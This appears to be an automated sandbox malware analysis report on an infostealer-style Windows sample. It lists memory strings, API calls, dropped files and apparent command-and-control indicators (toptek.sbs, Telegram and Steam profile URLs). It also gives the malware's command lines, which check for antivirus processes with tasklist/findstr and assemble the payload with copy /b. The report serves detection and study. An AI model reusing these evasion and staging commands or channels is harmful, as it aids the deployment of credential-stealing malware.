                Source: chrome.exe, 0000000F.00000003.2588635117.0000327001EE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2588251037.0000327001EA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogads-pa.googleapis.com
                Source: chrome.exe, 0000000F.00000003.2589259392.0000327001FDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com
                Source: chrome.exe, 0000000F.00000003.2588635117.0000327001EE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2588251037.0000327001EA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/app/so?eom=1
                Source: chrome.exe, 0000000F.00000003.2588635117.0000327001EE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2588251037.0000327001EA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ogs.google.com/widget/callout?eom=1
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://open.spotify.com
                Source: chrome.exe, 0000000F.00000003.2543571744.00003270006D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
                Source: chrome.exe, 0000000F.00000003.2543571744.00003270006D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
                Source: chrome.exe, 0000000F.00000003.2543571744.00003270006D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
                Source: chrome.exe, 0000000F.00000003.2543571744.00003270006D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
                Source: chrome.exe, 0000000F.00000003.2543571744.00003270006D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
                Source: chrome.exe, 0000000F.00000003.2543571744.00003270006D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
                Source: chrome.exe, 0000000F.00000003.2543571744.00003270006D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://outlook.live.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://outlook.live.com/mail/0/
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://outlook.live.com/mail/compose?isExtension=true
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=true
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://outlook.office.com/mail/0/
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://outlook.office.com/mail/compose?isExtension=true
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedge
                Source: msedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/AddSession
                Source: msedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/Logout
                Source: msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxAB
                Source: msedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/LogoutYxABzen
                Source: msedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/MergeSession
                Source: msedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/OAuthLogin
                Source: msedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/RotateBoundCookies
                Source: msedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/chrome/blank.html
                Source: msedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/o/oauth2/revoke
                Source: msedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth/multilogin
                Source: msedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v1/userinfo
                Source: msedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v2/tokeninfo
                Source: msedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/oauth2/v4/token
                Source: msedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/reauth/v1beta/users/
                Source: msedge.exe, 00000013.00000003.2683325695.000074D00247C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000017.00000003.2791860718.0000282802470000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://permanently-removed.invalid/v1/issuetoken
                Source: chrome.exe, 0000000F.00000003.2549667982.00003270003B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550158858.000032700120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2550016717.00003270010D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com?referrer=CHROME_NTP
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://powerpoint.new?from=EdgeM365Shoreline
                Source: chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.gcp.privacysandboxservices.com
                Source: chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com
                Source: chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com
                Source: chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://publickeyservice.pa.gcp.privacysandboxservices.com/.well-known/protected-auction/v1/public-k
                Source: 2cc80dabc69f58b6_1.24.drString found in binary or memory: https://sb.scorecardresearch.com/
                Source: chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.com2
                Source: chrome.exe, 0000000F.00000003.2580577256.000032700169C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://shieldedids-pa.googleapis.comJv
                Source: 2cc80dabc69f58b6_1.24.drString found in binary or memory: https://srtb.msn.cn/
                Source: 2cc80dabc69f58b6_1.24.drString found in binary or memory: https://srtb.msn.com/
                Source: chrome.exe, 0000000F.00000003.2566486639.0000327000E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
                Source: chrome.exe, 0000000F.00000003.2588677175.0000327001F04000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2589259392.0000327001FBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2588635117.0000327001EE8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.2588251037.0000327001EA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/bar/al-icon.png
                Source: Procedures.com, 0000000B.00000003.2364490676.0000000003FB7000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364595712.0000000003CD5000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364186643.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3157816062.0000000003FB1000.00000040.00001000.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3156069871.0000000003CB0000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364080745.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3152315599.000000000141D000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364772112.00000000014E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512
                Source: Procedures.com, 0000000B.00000003.2364772112.00000000014E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199809363512m0nk3Mozilla/5.0
                Source: Procedures.com, 0000000B.00000002.3161172557.0000000006854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                Source: Procedures.com, 0000000B.00000002.3161172557.0000000006854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                Source: Procedures.com, 0000000B.00000003.2364719873.0000000001475000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364636371.0000000001445000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364568713.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2363944038.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364636371.0000000001473000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364317456.000000000145C000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2363974153.0000000001475000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.m
                Source: Procedures.com, 0000000B.00000002.3152315599.000000000141D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                Source: Procedures.com, 0000000B.00000003.2364719873.0000000001475000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364636371.0000000001445000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364568713.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2363944038.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364636371.0000000001473000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364317456.000000000145C000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2363974153.0000000001475000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04
                Source: Procedures.com, 0000000B.00000002.3152315599.0000000001482000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364490676.0000000003FB7000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364595712.0000000003CD5000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364186643.0000000003CB1000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3157816062.0000000003FB1000.00000040.00001000.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3156069871.0000000003CB0000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364080745.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3152315599.000000000141D000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000003.2364772112.00000000014E1000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3157816062.0000000003FFD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04ael
                Source: Procedures.com, 0000000B.00000003.2364772112.00000000014E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/k04aelm0nk3Mozilla/5.0
                Source: Procedures.com, 0000000B.00000002.3152315599.000000000141D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/l
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://tidal.com/
                Source: Procedures.com, 0000000B.00000002.3157816062.0000000003FFD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs
                Source: Procedures.com, 0000000B.00000002.3156223014.0000000003D45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/
                Source: Procedures.com, 0000000B.00000002.3156223014.0000000003D45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbs/Q
                Source: Procedures.com, 0000000B.00000002.3157816062.000000000415C000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbsBVWXYZ1234567890isposition:
                Source: Procedures.com, 0000000B.00000002.3157816062.000000000402C000.00000040.00001000.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3157816062.000000000414F000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://toptek.sbsosh;
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://twitter.com/
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://vibe.naver.com/today
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://web.skype.com/?browsername=edge_canary_shoreline
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://web.skype.com/?browsername=edge_stable_shoreline
                Source: Procedures.com, 0000000B.00000002.3152315599.0000000001482000.00000004.00000020.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3157816062.0000000003FFD000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://web.telegram.org/
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://web.whatsapp.com
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://word.new?from=EdgeM365Shoreline
                Source: Procedures.com, 0000000B.00000002.3156448744.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3156223014.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, UKNGDB.11.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                Source: Eva.0.dr, Procedures.com.2.drString found in binary or memory: https://www.autoitscript.com/autoit3/
                Source: Procedures.com, 0000000B.00000002.3156448744.0000000003EF3000.00000004.00000800.00020000.00000000.sdmp, Procedures.com, 0000000B.00000002.3156223014.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, UKNGDB.11.drString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                Source: 5adcb9e1-aebe-49f6-8cc3-27139859cc45.tmp.24.drString found in binary or memory: https://www.deezer.com/
                Source: Procedures.com, 0000000B.00000002.3152315599.00000000014AD000.00000004.00000020.00020000.00000000.sdmp, P8Q1VA.11.drString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Eva.0.dr, Procedures.com.2.drString found in binary or memory: https://www.globalsign.com/repository/0
                Source: chrome.exe, 0000000F.00000003.2566486639.0000327000E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
                Source: chrome.exe, 0000000F.00000003.2566486639.0000327000E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
                Source: chrome.exe, 0000000F.00000003.2566486639.0000327000E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: chrome.exe, 0000000F.00000003.2550296822.0000327000E88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49739 version: TLS 1.2
                Source: unknown | HTTPS traffic detected: 94.130.188.57:443 -> 192.168.2.5:49745 version: TLS 1.2
                Source: C:\Users\user\Desktop\trZG6pItZj.exe | Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com | Code function: 11_2_00E9F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_00E9F7C7
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com | Code function: 11_2_00E9F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,11_2_00E9F55C
                Source: C:\Users\user\Desktop\trZG6pItZj.exe | Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com | Code function: 11_2_00EB9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_00EB9FD2
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com | Code function: 11_2_00E94763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,11_2_00E94763
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com | Code function: 11_2_00E81B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_00E81B4D
                Source: C:\Users\user\Desktop\trZG6pItZj.exe | Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_004038AF
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.com | Code function: 11_2_00E8F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,11_2_00E8F20D
                Source: C:\Users\user\Desktop\trZG6pItZj.exe | File created: C:\Windows\AuditorBoost
                Source: C:\Users\user\Desktop\trZG6pItZj.exe | File created: C:\Windows\LifeSox
                Source: C:\Users\user\Desktop\trZG6pItZj.exe | File created: C:\Windows\ReactionsReach
                Source: C:\Users\user\Desktop\trZG6pItZj.exe | File created: C:\Windows\RenoStruck
                Source: C:\Users\user\Desktop\trZG6pItZj.exe | File created: C:\Windows\LevyYu
                Source: C:\Users\user\Desktop\trZG6pItZj.exe | File created: C:\Windows\NlDistributors
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\139308\Procedures.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: String function: 00E40DA0 appears 46 times
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: String function: 00E3FD52 appears 40 times
                Source: C:\Users\user\Desktop\trZG6pItZj.exeCode function: String function: 004062CF appears 57 times
                Source: trZG6pItZj.exeStatic PE information: invalid certificate
                Source: trZG6pItZj.exe, 00000000.00000002.2081573085.00000000006BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs trZG6pItZj.exe
                Source: trZG6pItZj.exe, 00000000.00000003.2080977821.00000000006BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs trZG6pItZj.exe
                Source: trZG6pItZj.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@98/292@25/16
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E941FA GetLastError,FormatMessageW,11_2_00E941FA
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E82010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_00E82010
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E81A0B AdjustTokenPrivileges,CloseHandle,11_2_00E81A0B
                Source: C:\Users\user\Desktop\trZG6pItZj.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E8DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,11_2_00E8DD87
                Source: C:\Users\user\Desktop\trZG6pItZj.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comCode function: 11_2_00E93A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,11_2_00E93A0E
                Source: C:\Users\user\AppData\Local\Temp\139308\Procedures.comFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\FM5EQAV1.htmJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6584:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3360:120:WilError_03
                Source: C:\Users\user\Desktop\trZG6pItZj.exeFile created: C:\Users\user\AppData\Local\Temp\nssBE4E.tmpJump to behavior
                Source: trZG6pItZj.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Users\user\Desktop\trZG6pItZj.exeFile read: C:\Users\desktop.ini
                Source: C:\Users\user\Desktop\trZG6pItZj.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: 3E3OP8QIM.11.dr, IEUKNGLFC.11.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: trZG6pItZj.exeReversingLabs: Detection: 18%
                Source: trZG6pItZj.exeVirustotal: Detection: 26%
                Source: C:\Users\user\Desktop\trZG6pItZj.exeFile read: C:\Users\user\Desktop\trZG6pItZj.exe
                Source: unknownProcess created: C:\Users\user\Desktop\trZG6pItZj.exe "C:\Users\user\Desktop\trZG6pItZj.exe"
                Source: C:\Users\user\Desktop\trZG6pItZj.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Earning Earning.cmd & Earning.cmd
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 139308
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Frame" Ron
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Brochure + ..\Divine + ..\Surgery + ..\Posting j
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\139308\Procedures.com Procedures.com j
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
